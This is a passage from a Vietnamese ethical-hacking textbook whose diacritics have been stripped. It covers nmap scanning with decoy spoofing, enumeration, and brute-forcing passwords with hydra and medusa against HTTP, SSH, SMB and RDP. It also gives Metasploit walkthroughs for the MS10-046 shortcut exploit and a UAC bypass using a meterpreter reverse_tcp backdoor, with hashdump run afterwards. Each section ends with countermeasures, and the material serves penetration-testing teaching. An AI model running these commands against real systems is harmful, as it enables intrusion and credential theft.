a. Chuyn <target> t hostname thnh Ipv4 s dng DNS. Nu l mt a ch IP th khng cn chuyn. b. Thc hin ping ti host, mc nh vi mt gi tin yu cu ICMP echo v mt g tin TCP ACK gi ti cng 80 xc nh host c ang up hay khng? Nu khng, nmap s thot v hin thng bo. Chng ta c th s dung Ping NULL(-PN) b qua bc ny. c. Chuyn IP ch thnh tn vi truy vn DNS ngc. iu ny c th b qua vi thuc tnh n ci thin tc v kh nng khng bi pht hin. d. Thc hin qut TCP port vi hn 1000 port ph bin c lit k ti nmap-services. Qu trnh scan SYN s c thc hin, nhng Connect scan s c thay th khi ngi dng Unix khng phi root thiu quyn cn thit gi cc gi tin th.

e. In kt qua ln mn hnh Qut host ang up: nmap sP PE 192.168.10.0/24 -sP: ping scan -PE: ping echo

35

Ph thuc vo phc tp ca mng ch v cc host, qu trnh qut c th d dng b pht hin.Nmap cung cp kh nng lm gi a ch ngun vi ty chn Ddecoy. N c to ra lm trn ngp ci site ch vi nhng thng tin gi mo. Th c bn nm pha sau ty chn ny l chy scan gi cng lc vi scan tht. H thng ch s tr li trn cc a ch gi cng nh scan port thc ca chng ta. V quan trng hn c l a ch gi phi cn sng. Ngc li, qu trnhscan vi SYN v dn n iu kin t chi dch v Nmap sSPE 192.168.10.0/24 D 10.10.10.1

36

d) Phng chng:

Tt tt c cc dch v khng cn thit. Trn Unix, chng ta c th thc hin iu ny bng cch xem cc dch v khng cn thit trong /ect/inetd.conf v tt cc dch vscript lc khi ng. Trn Windows, rt kh tt cc dch v khng cn thit v theo cch hot ng ca Windows, cng TCP 139 v 445 cung cp nhiu chc nng Windows hot ng.
3. Xc nh h iu hnh

Nhiu cng c mnh v nhiu k thut qut port c sn tm cc cng m trn h thng ch. Nu nhn li, i tng u tin ca chng ta l qut cng xc nh cc cng TCP v UDP trn my ch. V vi nhng thng tin , chng ta c th cng no ang lng nghe c im yu no chng? Nhng chng ta cn tm nhiu thng tin hn v mc tiu. chnh l xc nh h iu hnh.
a) Active OS Detection

Thng tin cng chi tit v h iu hnh th n cng hu ch trong vic phn tch im yu. chng ta c th s dng k thut banner-grabbing, th ly thng tin t cc dch v FTP, telnet, SMTP, HTTP. y l cch n gin nht pht hin h iu hnh v phin bn m n ang chy. Theo , k thut ng n l k thut stack fingerprinting. N l mt k thut rt mnh cho php chng ta bit chc h iu hnh ch vi tin cy cao. Stack fingerprinting s yu cu ch nht mt cng ang lng nghe. Nmap c on c trong trng hp khng c cng no ang m.

37

Active OS detection gi cc gi tin n ch xc nh im c trng chi tit trong stack mng, iu ny cho php chng ta on h iu hnh. V phi gi cc gi tin nh th, nn rt d dng b pht hin. v th y khng phi l cch m hacker p dng tn cng. Nmap vi O xc nh h iu hnh.

b) Passive OS Detection

S dng passive stack fingerprinting. N tng t nh khi nim active stack fingerprinting. Thay v gi cc gi tin ti ch d dnh b pht hin. K tn cng m thm gim st giao thng mng xc nh h iu hnh ang s dng. V vy, bng vic gim st giao thng mng gia cc h thng khc nhau, chng ta c th xc nh c h iu hnh. K thut ny ph thuc vo v tr trung tm trn mng v trn cng cho php bt gi tin.

38

Chng 4:
I.

ENUMERATION

Enumeration l g? Enumeration (Lit k) l bc tip theo trong qu trnh tm kim thng tin ca t chc , xy ra sau khi scanning v l qu trnh tp hp v phn tch tn ngi dng, tn ma y ,ti nguyn chia s v cc dch v . N cng ch ng truy vn hoc kt n i t i mu c tiu co c nh ng thng tin hp l hn . Enumeration (lit k) c th c nh ngha l qu trnh trch xut nhng thng tin c c trong phn scan ra thnh mt h thng c trt t. Nhng thng tin c trch xut bao gm nhng th c lin quan n mc tiu cn tn cng, nh tn ngi dng (user name), tn my tnh (host name), dch v (service), ti nguyn chia s (share).Nhng k thut lit k c iu khin t mi trng bn trong. Enumeration bao gm c cng on kt ni n h thng v trc tip rt trch ra cc thng tin. Mc ch ca k thut lit k l xc nh ti khon ngi dng v ti khon h thng c kh nng s dng vo vic hack mt mc tiu . Khng c n thi t pha i ti m m t ta i khoa n qua n tri vi c hng ta c th tng ta i khon ny ln n mc co c quy n nh t cho phe p truy c p va o nhi u ta i khoa n hn a c p tr c y . Banner Grabbing K thut ch yu nht ca enumeration l banner grabbing, N c th c nh ngha n gin nh l kt ni n ng dng t xa v quan st u ra. N c nhiu thng tin cho k tn cng t xa. t nht chng ta cng xc nh c m hnh dch v ang chy m nhiu trng hp l to nn qu trnh nghin cu cc im yu. Phng chng: tt cc dch v khng cn thit. chng ta c th gii hn vic truy cp ti cc dch v iu khin truy cp mng. III. Enumerating cc dch v mng II.

1. Http fingerprinting
a) Telnet

TELNET (vit tt ca TerminaL NETwork) l mt giao thc mng (network protocol) c dng trn cc kt ni vi Internet hoc cc kt ni ti mng my tnh cc b LAN. Ti liu ca IETF, STD 8, (cn c gi l RFC 854 v RFC 855) c ni rng: Mc ch ca giao thc TELNET l cung cp mt phng tin truyn thng chung chung, c tnh lng truyn, dng rng 8 bit, nh hng byte. TELNET l mt giao thc khch-ch (client-server protocol), da trn nn TCP, v phn khch (ngi dng) thng kt ni vo cng 23 vi mt my ch, ni cung cp chng trnh ng dng thi hnh cc dch v. 39

S dng telnet tm hiu thng tin t cng dch v ang m, s dng cng c t xa ly thng tin thng qua cng telnet m hu ht cc h iu hnh iu h tr. C:\>telnet www.google.com 80

b) Netcat

L mt tool cho php ghi v c data thng qua giao thc TCP v UDP. Netcat c th s dng nh port scanner, backdoor, port redirecter, port listener, S dng netcat bng dng lnh: - Ch kt ni : nc [-ty_chn] tn_my cng1[-cng2]

- Ch lng nghe: nc -l -p cng [-ty_chn] [tn_my] [cng] V d: Ly banner ca Server: nc n 192.168.10.102, cng 80 Qut cng 40

chy netcat vi ty chn -z. V d scan cc cng TCP(1->500) ca host 192.168.10.102

nc v www.google.com 80 www.google.com [74.215.71.105] 80 (http) open

c) Open SSL

L s n lc hp tc nhm pht trin b m ngun m vi y tnh nng, c trin khai trn giao thc SSL (version 2 v version 3) vgiao thc TSL(version 1) c qun l bi cng ng nhng ngi tnhnguyn trn ton th gii s dng Internet kt ni v pht trin bOpenSSL v cc ti liu c lin quan. Hu ht cc phn mm nh IMAP&POP, Samba, OpenLDAP, FTP,Apache v nhng phn mm khc u yu cu cng vic kim tra tnh xcthc ca ngi s dng trc khi cho php s dng cc dch v ny. Nhngmc nh vic truyn ti s xc minh thng tin ngi s dng v mt khu(password) dng vn bn thun ty nn c th c c hoc thay i bimt ngi khc. K thut m ha nh SSL s m bo tnh an ton v nguynvn ca d liu, vi k thut ny thng tin truyn trn mng dng im niim c m ha. Mt khi OpenSSL c ci t trn Linux server chng ta c th s dng n nh mt cng c th ba cho php cc ng dngkhc dng tnh nng SSL OpenSSL l mt b cng c mt m trin khai trn giao thc mng SSLv TLS v cc chun mt m c lin quan. Chng trnh OpenSSL l mt cng c dng lnh 41

s dng cc chcnng mt m ca cc th vin crypto ca OpenSSL t nhn. OpenSSL c cc th vin cung cp cc chc nng mt m cho cc ngdng nh an ton webserver. L phn mm m ngun m , c th s dng c cho c mc ch thng mi v phi thng mi vi tnh nng m ho mnh trn ton th gii, h tr cc giao thc SSLv2 v SSLv3 v TLSv1, cho c php m ho RSA v Diffie-Hellman, DSO. H tr cho OpenSSL v RSArefUS, nng cao kh nng x l cm mt khu i vi kho ring .Chng ch X.509 da vo xc thc cho c pha client v server, H tr danh sch thu hi chng ch X.509, kh nng ti iu chnh i vi mi URL ca cc tham s bt tay SSL.
2. DNS Enumeration

DNS Enumeration l qu trnh nh v tt c cc my ch DNS v tng ng ca h h s cho mt t chc. Mt cng ty c th c c hai ni b v bn ngoi my ch DNS c th mang li thng tin nh tn ngi dng, tn my tnh, v a ch IP ca h thng mc tiu tim nng. Hin c rt nhiu cc cng c c th c s dng c c thng tin cho thc hin DNS lit k. Cc v d v cc cng c c th c s dng lit k DNS nslookup, DIN, Registry M cho s Internet (ARIN), v Whois. k khai DNS, chng ta phi c s hiu bit v DNS v lm th no n hot ng. Chng ta phi c kin thc v cc bn ghi DNS. Danh sch cc bn ghi DNS cung cp mt ci nhn tng quan cc loi bn ghi ti nguyn (c s d liu h s) c lu gi trong cc tp tin khu vc ca tn min System (DNS). DNS thc hin mt c s d liu phn tn, phn cp, v d phng thng tin lin kt vi cc tn min Internet v a ch. Trong nhng min my ch, cc loi h s khc nhau c s dng cho cc mc ch khc nhau. Danh sch sau y m t bn ghi DNS ph bin cc loi v s dng ca h: A (a ch)-Bn mt tn my ch n mt a ch IP SOA (Start of Authority)-Xc nh my ch DNS c trch nhim cho cc tn min thng tin CNAME (tn kinh in)-Cung cp tn hoc b danh cho a ch ghi MX (th trao i) Xc nh cc my ch mail cho tn min SRV (dch v)-Nhn dng cc dch v nh dch v th mc PTR (pointer)-Bn a ch IP lu tr tn NS (tn my ch)-Xc nh my ch tn khc cho tn min 42

DNS Zone Transfer thng c s dng ti to d liu DNS trn mt s my ch DNS, hoc sao lu cc tp tin DNS. Mt ngi s dng hoc my ch s thc hin mt yu cu chuyn giao khu vc c th t mt name server.Nu my ch tn cho php di chuyn vng xy ra, tt c cc tn DNS v IP a ch lu tr bi cc my ch tn s c tr li trong vn bn ASCII con ngi c th c c. Nslookup

Ta cng c th dng lnh trc tip nh sau: Nslookup type=any tuoitre.vn Type l loi dch v mng, nh lit k trn: NS(nameserver), MX(mail exchange), any(tt c). Tuoitre.vn: mt domain

43

3. Netbios name

NetBIOS l mt t vit tt cho mng Basic Input / Output System. N cung cp cc dch v lin quan n lp phin ca m hnh OSI cho php cc ng dng trn cc my tnh ring giao tip qua mt mng cc b. Tht s nh mt API, NetBIOS khng phi l mt giao thc mng. H iu hnh c hn chy NetBIOS trn IEEE 802,2 v IPX / SPX s dng tng ng giao thc Frames NetBIOS (NBF) v NetBIOS trn IPX / SPX (NBX) . Trong cc mng hin i, NetBIOS bnh thng chy trn giao thc TCP / IP thng qua NetBIOS qua giao thc TCP / IP (NBT) .iu ny dn n tng my tnh trong mng c c mt tn NetBIOS v mt a ch IP tng ng vi mt (c th khc nhau) tn my ch. NetBIOS name l c ch t tn cho cc ti nguyn trong 1 h thng theo khng gian phng (khng c khi nim phn cp).

44

Chng 5:
I.

PASSWORD CRACKING

Gii Thiu L qu trnh tm kim hoc phc hi password vi nhiu mc ch khc nhau.

Mc ch ca vic password cracking l gip cho ngi dng c th ly li mt khu qun trc , hoc chim ot quyn truy cp khng xc thc ti h thng. II. Cc K Thut Password Cracking Attacks s s dng file t in c sn cha cc hash so snh vi hash ca password tm ra dng plaint text ca password nu hash trng nhau. Chng ta c th thm hoc o cc t c trong t in (Hybird Attacks). Dng ny ng dng tt khj password l nhng k t thng thng, tc nhanh, mc thnh cng ty thuc vo t in.
2. Brute Forcing Attacks

1. Dictionary Attacks/Hybrid Attacks

S dng mi t hp ca tt c cc k t a vo hash v so snh. Kh nng thnh cng l tuyt i nu c thi gian v tc crack rt lu trong trng hp password di v phc tp. ch tt cho password ngn.
3. Syllable Attacks/Pre-Computed Hashes

Kt hp hai cch trn bng cch to sn cc bn hash ca tt c t hp cc k t v ch so snh trong qu trnh hash. Tc crack ch mt vi pht nu c sn cc bn hash. III. Cc Kiu Tn Cng Thng Gp

1. Active Password Cracking

Tm 1 username co th c va do ti m password theo username o .Qu trnh ny c th t ng ho tng tc tm kim . Cc dng tn cng kiu Active Password Cracking: o Password guessing: mt tp hp t in cc t v tn cng nh mt khu v th tt c s kt hp crack cc password. Kiu tn cng ny cn nhiu thi gian v lng bng thng mng ln; d dng bi pht hin. o Trojan/Spyware/Keylogger: l chng trnh chy nn gip cho k tn cng c th ghi li bt k phm no c nhn (Keylogger); 45

thu thp thng tin mt cch b mt v c nhn, t chc (Spyware); vi s gip ca Trojan, k tn cng c th ly quyn truy cp vo cc password c lu tr v c th c cc ti liu c nhn, xa file.
2. Passive Password Cracking

Capture qua trnh log -in trn ng truy n break password offline(Sniff, MITM) Cc kiu tn cng ny bao gm: o Wire Sniffing: k tn cng chy cc cng c sniffing gi tin trong mng LAN truy cp v ghi li cc giao thng mng ang sng. D liu bt c c th s bao gm password c gi ti cc h thng t xa thng qua cc giao dch Telnet, FTP, rlogin v mail in t gi v nhn. o Man-in-the-Middle (MITM) and Replay Attack: Trong tn cng MITM, attacker ginh quyn truy cp vo knh giao tip gia nn nhn v server tm kim thng tin; trongreplay attack, cc gi tin v th bi (token) xc thc c bt s dng mt sniffer.
3. Offline Password Cracking

Tip xc trc tip vi my tnh nn nhn copy cc file lu tr thng tin. V d, SAM database trn Windows (%systemroot%/system32/config) hay /root/passwd trn Linux. Sau c th s dng John tm password dang plain text. IV. Cc cng c Password Cracking

1. Hydra
a) Gii thiu

Hydra l mt cng c b kha ng nhp mng rt nhanh, h tr nhiu giao thc v dch v khc nhau. Hydra l trnh b kha ng nhp xong xong, ngha l n chy nhiu tc v cung mt lc qu trnh b kha c nhanh hn. Cng c ny cho php cc nh nghin cu v chuyn gia bo mt c th trnh by mc d dng chim quyn truy cp khng xc thc t xa ti h thng no

46

b) Cch dng

C php chung ca Hydra l: Hydra [[-l LOGIN|-L FILE] [-p PASSWORD|-P FILE]]|[-C FILE]] [-t task] [-w wait] [server server | IP] [service://server[:port]]

V d: 47

hydra f L http://192.168.10.1 Trong :

login.txt

password.txt

192.168.10.1

http-get

-f: finish:tm c cp username v password hp l u tin s kt thc -L: file username (-l username) -P: file password (-p password) 192.168.10.1: a ch ip cn b kha mt khu ng nhp http-get: dch v http cng 80 (http c thay th bng http-get v httphead) http://192.168.10.1 l trang web cn cho qu trnh crack.

2. Medusa
a) Gii thiu

Medusa c th c s dng brute-force ng nhp theo tng module theo c ch song song v nhanh chng. mc ch ca n l h tr nhiu dch v m c th cho php qu trnh xc thc t xa nu c th. Medusa c thit k da vo ba c im sau: Kim tra song song da vo lung: c th kim tra trn nhiu host, username, password. Thit k theo module: Mi dch v tn ti dng file (.mod) c lp. Chng ta khng cn thit chnh sa n nhn m rng danh sch cc dch v h tr for vic brute-forcing.

48

b) Cch dng

C php: Medusa [h host | -H file] [-u username | -U file] [-p password | -P file] [-C file] M module [OPT] -h host hay a ch IP, -H file cha cc host 49

-u username, -U file cha username -p password, -P file cha password -C file kt hp dng host, username, password dng host:username:password -M module l bt buc theo sau l tn cc module c h tr. xem tt c cc module ta g: medusa d v cch dng chi tit cho 1 module no : medusa M tn_module q

50

V.

Password Cracking Trn Cc Giao Thc

1. HTTP (HyperText Tranfer Protocol)


c) Khi nim

y l giao thc chuyn i siu vn bn v thng c s dng cho cc ng dng Web (World Wide Web WWW) trn cng mc nh l 80.
d) C 2 dng m ha HTTP:

Basic access authentication: l phng php trnh duyt web hoc cc chng trnh khc cung cp username v password when c yu cu. N h tr tt c cc trnh duyt web, tuy nhin, c username v password c gi i dng plain text nn t c p dng vo thc t. V qu trnh ng nhp vo router l mt v d in hnh.

51

Chng ta c th dng Wireshark bt:

52

Nh trn hnh username v password bt c: admin:12345 Digest access authentication: l mt trong nhng phng php c tha thun p dng cho my ch web c th vt qua cc thng tin vi trnh duyt web ca ngi dng. N s dng hm bm(hash) m ha cc thng tin nhy cm trc khi gi chng qua mng.
e) Crack Password HTTP

Ta c th dng nmap (Network Mapper) qut cng no ang m:

53

Truy cp vo trinh duyt kim tra th qu trnh xc thc

Khi nhn nt Cancel ta c thng bo:

54

Vo Terminal trn BackTrack 5 g: hydra f L login.txt P password.txt 192.168.10.1 http-get http://192.168.10.1 Trong : -f: finish:tm c cp username v password hp l u tin s kt thc -L: file username (-l username) -P: file password (-p password) 192.168.10.1: a ch ip cn b kha mt khu ng nhp http-get: dch v http cng 80 (http c thay th bng http-get v httphead) http://192.168.10.1 l trang web cn cho qu trnh crack.

55

Hoc: medusa h 192.168.10.1 U login.txt P password M http Trong : -h host hay a ch ip cn b kha mt khu ng nhp. -U: file username (-u username) -P: file password (-p password) -M http giao thc cn crack. M vit tc cho modum

56

Sau quay li trinh duyt web, ta nhp username v password tm c:

57

2. SSH (Secure Shell)


a) Khi nim

SSH l mt giao thc mng cho vic giao tip d liu bo mt, cc dch v shell t xa hoc thc thi lnh vn cc dch v mng bo mt khc gia cc my tnh c ni mng vi nhau. N kt ni thng qua mt knh bo mt trn mt mng khng bo mt: mt my ch v mt my khch (chy cc chng SSH server v SSH Client). ng dng c bit n nhiu nht ca giao thc ny l vic truy cp n ti khon shell ca h iu hnh LIKE-UNIX (LINUX). N sinh ra thay th cc chun giao thc khng bo mt khc nh telnet, rsh, rexec , khi m password c gi i dng plain text, c th d dng c c. SSH hot ng trn TCP cng 22.
b) Crack password qua SSH

Kim tra dch v ssh c ang chy hay khng?

Vi hydra: hydra f L login.txt P password.txt 192.168.10.101 ssh

58

Vi Medusa: medusa h 192.168.10.101 U login.txt P password.txt M ssh

V y l cch truy cp vo thit b Nokia N900 t xa vi username v password va tm c:

59

V d kim tra cc card mng t xa:

60

3. SMB (Server Message Block)


a) Khi nim

SMB c bit n nh l Common Internet File System (CIFS), hot ng tng ng dng trong m hnh OSI, thng thng c s dng cung cp truy cp chia s cc file, my in v cc giao tip khc nhau gia cc nt mng trn mng. N cn cung cp k thut giao tip lin qu trnh c xc thc. Hu ht s dng ca SMB u lin quan n Microsoft Windows. SMB c th chy trn tng giao dch (Session) hoc thp hn: o Trc tip trn TCP cng 445; o Thng qua NetBIOS (cung cp nhiu dch v lin quan n tng ng dng trong m hnh OSI cho php cc ng dng trn cc my tnh phn bit c th giao tip vi nhau thng qua mng LAN) trn UDP cng 137, 138 v TCP 137, 139
b) Crack password SMB

Qut xem c my no ang chy dch v smb port 445 hay khng?

61

Vi Hydra tao g: hydra f L login.txt P password.txt 192.168.10.100 smb

Vi Medusa, ta g: medusa h 192.168.10.100 U login.txt P password.txt smbnt

62

V y l cch chng ta s dng username v password va tm c

63

4. RDP (Remote Desktop Protocol)


a) Khi nim

RDP l mt giao thc giao tip ca c nhn hay t chc c pht trin bi Microsoft, cung cp cho ngi dng mt giao din ha i vi my tnh khc. Hin ti, Microsoft chuyn phn mm ch (server) RDP sang Remote Desktop Services nh Terminal Services (dch v u cui) v phn mm khch (client) nh l Terminal Services Client. Khi thc hin kt ni n mt my tnh no t xa, chng ta s nhn c yu cu xc thc ngi dng v mt khu ph hp. V vy vic crack password RDP l cn thit nu ta truy cp m cha c s chp nhn ca ngi dng. RDP hot ng trn TCP cng 3389
b) Crack password RDP

Qut my tnh xem no c cng 3389 ang m hay khng?

64

Vi Hydra: hydra f L login.txt P password.txt 192.168.10.100 rdp t 4 w1

Vi Medusa, n khng h tr trc tip giao thc RDP. Tuy nhin, ta c th dng modum wrapper vi script l rdesktop. Ta thc hin nh sau:

65

Medusa M wrapper m TYPE:STDIN m PROG:rdesktop m ARGS:-u %U p - %H h 192.168.10.100 U login.txt P password.txt Tuy vy, chng trnh vn hot ng cha ng n lm v tn nhiu thi gian v phi k tn cng phi nhp vo tng password mt. y l cch dng rdesktop iu khin my tnh t xa vi username v password tm c:

66

Chng 6:
I. GII THIU V METASPLOIT

SYSTEM HACKING

1. Gii thiu

Metasploit l mt d n bo mt my tnh cung cp cc thng tin v vn l hng bo mt cng nh gip v kim tra thm nhp v pht trin h thng pht hin tn cng mng. Mt d n con rt ni ting ca Metasploit l Metasploit Framework. Metasploit Framework l mt mi trng dng kim tra ,tn cng v khai thc li ca cc service. Metasploit c xy dng t ngn ng hng i tng Perl, vi nhng components c vit bng C, assembler, v Python.Metasploit c th chy trn hu ht cc h iu hnh: Linux, Windows, MacOS. Chng ta c th download chng trnh ti www.metasploit.com Metasploit c phin bn hin ti l 4.4.
2. Cc thnh phn ca Metasploit

Metasploit h tr nhiu giao din vi ngi dng: Console interface: dng lnh msfconsole. Msfconsole interface s dng cc dng lnh cu hnh, kim tra nn nhanh hn v mm do hn Web interface: dng msfweb, giao tip vi ngi dng thng qua giao din web Command line interface: dng msfcli Enviroment : Global Enviroment:c thc thi thng qua 2 cu lnh setg v unsetg, nhng options c gn y s mang tnh ton cc, c a vo tt c cc module exploits Temporary Enviroment: c thc thi thng qua 2 cu lnh set v unset, enviroment ny ch c a vo module exploit ang load hin ti, khng nh hng n cc module exploit khc Chng c th lu li enviroment mnh cu hnh thng qua lnh save. Mi trng s c lu trong ./msf/config v s c load tr li khi user interface c thc hin
3. S dng Metasploit Framework
a) Chn module exploit

La chn chng trnh, dch v li m Metasploit c h tr khai thc 67

show exploits: xem cc module exploit m framework c h tr use exploit_name: chn module exploit info exploit_name: xem thng tin v module exploit Chng ta nn cp nht thng xuyn cc li dch v cng nh cc module trn www.metasploit.com hoc qua lnh msfupdate hoc svn update /opt/metasploit/msf3/
b) Cu hnh module exploit chn

show options: Xc nh nhng options no cn cu hnh set : cu hnh cho nhng option ca module Mt vi module cn c nhng advanced options, chng ta c th xem bng cch gdng lnh show advanceds
c) Verify nhng options va cu hnh

check: kim tra xem nhng option c set chnh xc cha.


d) La chn target

La chn h diu hnh no thc hin show targets: nhng target c cung cp bi module set: xc nh target no vd: msf> use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
e) La chn payload

Payload l on code m s chy trn h thng remote machine, l mt phn ca virus my tnh thc thi m c. show payloads: lit k ra nhng payload ca module exploit hin ti info payload_name: xem thng tin chi tit v payload set payload payload_name: xc nh payload module name.Sau khi la chn payload no, dng lnh show options xem nhng options ca payload show advanced: xem nhng advanced options ca payload
f) Thc thi exploit

exploit: lnh dng thc thi payload code. Payload sau s cung cp cho chng ta nhng thng tin v h thng c khai thc
4. Gii thiu Payload Meterpreter

Meterpreter, vit tt t Meta-Interpreter l mt payload nng cao c trong Metasploit Framework. Muc ch ca n l cung cp nhng tp lnh khai thc, 68

tn cng cc my remote computers. N c vit t cc developers di dng shared object (DLL) files. Meterpreter v cc thnh phn m rng c thc thi trong b nh, hon ton khng c ghi ln a nn c th trnh c s pht hin t cc phn mm chng virus Meterpreter cung cp mt tp lnh chng ta c th khai thc trn cc remote computers: Fs(Filesystem): cung cp qu trnh tng tc vi filesystem Net: cho php xem thng tin mng ca remote machine nh IP, route table Process:cho php to tng tc vi cc tin trnh trn remote machine Sys: cho php xem thng tin h thng, mi trng ca remote machine
a) S dng module Fs

cd directory:ging lnh cd ca commandline, chuyn th mc lm vic getcwd:cho bit th mc ang lm vic hin ti ls:lit k cc th mc v tp tin upload src1 [src2 ...] dst:upload file t src ti dst. download src1 [src2 ...] dst:download file t src ti dst.
b) S dng module Net

ipconfig:xem cu hnh ca card mng ca my tnh t xa route:xem bng nh tuyn ca remote machine
c) S dng module Process

execute -f file [ -a args ] [ -Hc ]:Cu lnh execute cho php to ra mt process mi trn remote machine v s dng process khai thc d liu kill pid1 pid2 pid3:hu hoc tt cc process ang chy trn my remote machine ps:lit k nhng process ca remote machine
d) S dng module Sys

getuid: cho bit username hin ti ca remote machine sysinfo:cho bit thng tin v my tnh nn nhn: h iu hnh, phin bn, nn tn 32bits hay 64bits

69

5. Cch phng chng

Thng xuyn cp nht cc bn v li ca Microsofts. V d nh Metasploit khng th khai thc c li Lsass_ms04_011, chng ta phi cp nht bn v li ca Microsoft. Theo Microsoft nh gi, y l mt li nghim trng, c trn hu ht tt c cc h iu hnh windows. Chng ta nn s dng hotfix c number l 835732 v li trn. II. Li MS10-046 (2286198)

1. Gii thiu

y l mt li rt nghim trng lin quan n Windows Shellca cho tt c cc h iu hnh b nh hng, cho php k tn cng chim ly ton quyn iu khin Windows v thc thi m ngun t xa. Li ny c pht hin vo thng 06/2010 v n thng 08/2010, Microsoft tung ba bn v li. Li nguy him ny nm trong cc tp tin "shortcut" (*.lnk) ca Windows, cc tp tin ny thng nm giao din desktop hay trnh n Start. Bng cch to ra mt tp tin shortcut nhng m c, tin tc c th t ng thc thi m c khi ngi dng xem tp tin shortcut hay ni dung ca mt th mc cha tp tin shortcut nhng m c. Cc bn Windows b nh hng bao gm.

70

H iu Hnh Windows Server 2008 for 32-bit Systems and Windows Server 2008 for 32-bit Systems Service Pack 2* Windows Server 2008 for x64-based Systems and Windows Server 2008 for x64-based Systems Service Pack 2* Windows Server 2008 for Itanium-based Systems and Windows Server 2008 for Itanium-based Systems Service Pack 2 Windows 7 for 32-bit Systems Windows 7 for x64-based Systems Windows Server 2008 R2 for x64-based Systems* Windows Server 2008 R2 for Itaniumbased Systems

Windows XP Service Pack 3 Windows XP Professional x64 Edition Service Pack 2

Windows Server 2003 Service Pack 2 Windows Server 2003 x64 Edition Service Pack 2 Windows Server 2003 with SP2 for Itanium-based Systems Windows Vista Service Pack 1 and Windows Vista Service Pack 2 Windows Vista x64 Edition Service Pack 1 and Windows Vista x64 Edition Service Pack 2

2. Cc bc tn cng:

Saukhi khi ng BackTrack v ang nhp thnh cng, ta khi ng Terminal ta c:

Ta g tip: msfconsole v enter: 71

dng m li ms10-046: search ms10-046 v enter

Ta g tip: use exploit/windows/browser/ms10_046_shortcut_icon_dllloader v enter 72

Dng lnh: show options xem cc tham s cn thit c th tin hnh tn cng c: o SRVHOST: a ch my ca k tn cng, lng nghe c nn nhn no kt ni n hay khng o SRVPORT: cng lng nghe, mc nh l http (80)

73

Ta s: o set PAYLOADwindows/meterpreter/reverse_tcp o set SRVHOST 192.168.1.200 o set lhost a ch IP: set LHOST 192.168.1.200. LHOST l tham s ca PAYLOAD m ta va set trn.

exploit khi ng server lng nghe trn my tnh tn cng

74

Trn my tnh nn nhn, to 1 shortcut bng cch nhn phi chut vo Desktop -> New -> Shortcut

75

Ta g vo a ch ca my tn cng vo Type the location of the item: http://192.168.1.200/anythingv chn Next

t tn cho shortcut va mi to v nhn Finish. Ta s m shortcut ny:

76

i mt lt, trn my tnh tn cng ta c:

Dng lnh sessions xem cc phin lm vic m Metasploit ang c:

77

tng tc vi 1 session no ta thc hin: sessions i 1 (1 l id ca sessions)

V by gi th mi vic tr nn d dng hn, khi k tn cng iu khin c my nn nhn vi ton quyn. V d: Lnh sysinfo ly thng tin ca my nn nhn: Lnh hashdump ly mt khu ca ngi dng di dng hash

78

Lnh rt hu ch s dng cmd (command-line): shell

3. Cch phng chng

Thng xuyn cp nht cc bn v li ca Windows trch b hacker li dng.

79

Bn v li c tn m l KB2286198 cha ng phin bn mi ca tp tin Shell32.dll, y l phn cp nht quan trng. Shell32.dll l mt tp tin th vin rt quan trng trong Windows, n cha ng mt s hm Windows Shell API. Nu Shell32.dll b li hay cp nht li, my tnh s c tnh trng "Mn hnh xanh cht chc" hay Blue Screen. III. Li BYPASSUAC

1. Gii thiu

T Windows Vista tr v sau, Microsoft gii thiu mt tin ch c xy dng sn l User Access Control (UAC). UAC lm tng tnh bo mt ca Windows bng cch gii hn cc phn mm ng dng ca nhm quyn ngi s dng c bn. V vy, ch nhng phn mm c ngi dng tin tng mi nhn c quyn qun tr, nhng phn mm khc th khng. Tuy nhin, vi ti khon ca ngi qun tr, cc ng dng vn b gii hn nh nhng ti khon thng khc. Cc h iu hnh c tch hp sn User Access Control iu b nh hng v c th khai thc.
2. Cc bc tn cng

Vo Terminal, g msfconsole v Enter:

use exploit/multi/handler. y l mt modume cung cp nhiu chc nng ca h thng payload Metasploit cho chng ta khai thc bng cch 80

thc hin: run post/windows/escalate/bypassuac nh l v d trong trng hp ny v cn nhiu th khc na. set PAYLOAD windows/meterpreter/reverse_tcp: cho php kt ni li vi my tnh tn cng d dng iu khin. set LHOST 192.168.1.202: host lng nghe, a ch IP ca my tn cng set LPORT 6789:port lng nghe, ty min l cha c s dng.

exploit bt u khi ng server.

81

Ta s to ra mt con backdoor cho php kt ni n server m chng ta khi ng sn trc .

82

Sau khi to xong, ta copy file backdoor.exe n my tnh nn nhn v thc thi. Chng ta c th s dng Samba chia s file gia Windows v Linux. Trn my tnh Windows, ta s share file vi ton quyn truy cp:

83

Tr li my tnh nn nhn, v thc thi file backdoor.exe va copy. Khi trn my tnh nn nhn chng ta s nhn c nh sau:

Ta c 1 phin lm vic vn cha iu khin ton quyn c. thc hin ta cn thc hin lnh: run post/windows/escalate/bypassuac

84

Chng ta c th xem tt c cc lnh h tr bng lnh: help

3. Cch phng chng

Rt tic l cho n thi im hin ti, Microsoft vn cha xc nhn li trong UAC cng nh cung cp bn v cho l hng bo mt ny. Mt pht ngn vin ca Microsoft khng nh khng c l hng vo trong UAC c. V th, chng ta cn ci t phn mm dit virus, backdoor c uy tnh trn th trng trnh b li dng.

85

Chng 7:

WEB HACKING VI DVWA

I. Gii thiu i vi nhng chng ta mi nghin cu hacking, mi trng th nghim l rt quan trng, tuy nhin tm c mi trng thc t, ph hp vi trnh li khng n gin. Ngc li, i vi nhng ngi c trnh v kinh nghim hacking, chc hn cc chng ta cng c nhu cu th nghim trnh hacking ca mnh n u cng nh nng cao thm kh nng bn thn. Vy th DVWA- Damn Vulnerable Web Application c th p ng nhu cu ca c nhng ngi mi vo cng nh nhng ngi c trnh nht nh. DVWA l mt framework xy dng sn nhng l hng bo mt theo top 10 im yu bo mt Web ca OWASP. Trnh t mc low n high c th p ng nhu cu hack ca rt nhiu ngi. Vy DVWA l mt ng dng web PHP / MySQL b li. Mc tiu chnh ca n l gip cho cc chuyn gia an ninh kim tra k nng v cng c ca h trong mt mi trng hp php, gip cc nh pht trin web hiu r hn v cc qu trnh m bo cc ng dng web v h tr gio vin / hc sinh ging dy / hc bo mt ng dng web trong mt mi trng lp hc. II. Hng dn ci t DVWA trn Backtrack Do y l framework trn nn php nn n gin cc chng ta dng webserver bng XAMPP trc, ri copy DVWA vo, chng ta s s dng DVWA trn giao din web.
1. Ti v ci t XAMPP

V y l phn mm m ngun m, nn cc chng ta hy vo trang ch ca XAMPP http://www.apachefriends.org/en/xampp.html ti phin bn mi nht v my.

86

Sau khi download XAMPP v, cc chng ta vo Terminal v g lnh nh hnh bn di

Khi ng XAMPP ln

87

